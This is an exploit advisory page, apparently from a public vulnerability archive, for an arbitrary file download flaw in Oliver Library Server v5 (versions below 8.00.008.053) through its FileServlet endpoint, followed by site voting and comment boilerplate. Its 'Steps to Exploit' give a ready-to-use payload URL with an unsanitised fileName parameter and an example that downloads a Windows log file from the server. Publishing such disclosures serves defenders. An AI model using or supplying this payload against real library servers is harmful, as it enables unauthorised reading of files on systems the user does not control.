Oliver Library Server v5 Arbitrary File Download

2021.12.19

Credit: Mandeep Singh, Ishaan Vij, Luke Blues, CTRL Group

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-200

# Exploit Title: Oliver Library Server v5 - Arbitrary File Download
# Date: 14/12/2021
# Exploit Authors: Mandeep Singh, Ishaan Vij, Luke Blues, CTRL Group
# Vendor Homepage: https://www.softlinkint.com/product/oliver/
# Product: Oliver Server v5
# Version: < 8.00.008.053
# Tested on: Windows Server 2016
Technical Description:
An arbitrary file download vulnerability in Oliver v5 Library Server Versions < 8.00.008.053 via the FileServlet function allows for arbitrary file download by an attacker using unsanitized user supplied input.
Steps to Exploit:
1) Use the following Payload:
https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=<arbitrary file path>
2) Example to download iis.log file:
https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=c:/windows/iis.log

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Oliver Library Server v5 Arbitrary File Download

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.